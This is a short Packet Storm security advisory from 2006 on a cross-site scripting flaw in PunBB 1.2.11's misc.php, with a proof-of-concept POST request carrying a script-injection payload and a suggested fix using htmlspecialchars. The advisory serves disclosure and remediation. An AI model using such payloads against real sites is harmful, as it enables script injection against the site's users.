punBB1211.txt

2006-05-06T00:00:00
ID PACKETSTORM:46098
Type packetstorm
Reporter D3vil-0x1
Modified 2006-05-06T00:00:00

Description

                                        
                                            `PunBB 1.2.11 Cross-Site Scripting  
  
File name :- misc.php  
Action :- Send Email  
Line :- 123  
  
[php]  
redirect($_POST['redirect_url'], $lang_misc['E-mail sent redirect']);  
[/php]  
  
The $_POST['redirect_url'] = Unfilter Input  
  
Exploit :-  
  
Send POST Request  
  
[code]  
GET :-  
/PunBB/misc.php?email=2  
POST :-  
form_sent=1&redirect_url=index.php&req_subject=test&req_message=test"><script>alert(1);</script>  
[/code]  
  
Fix :-  
  
Replace The Line With :-  
  
[php]  
redirect(htmlspecialchars($_POST['redirect_url']), $lang_misc['E-mail sent redirect']);  
[/php]  
`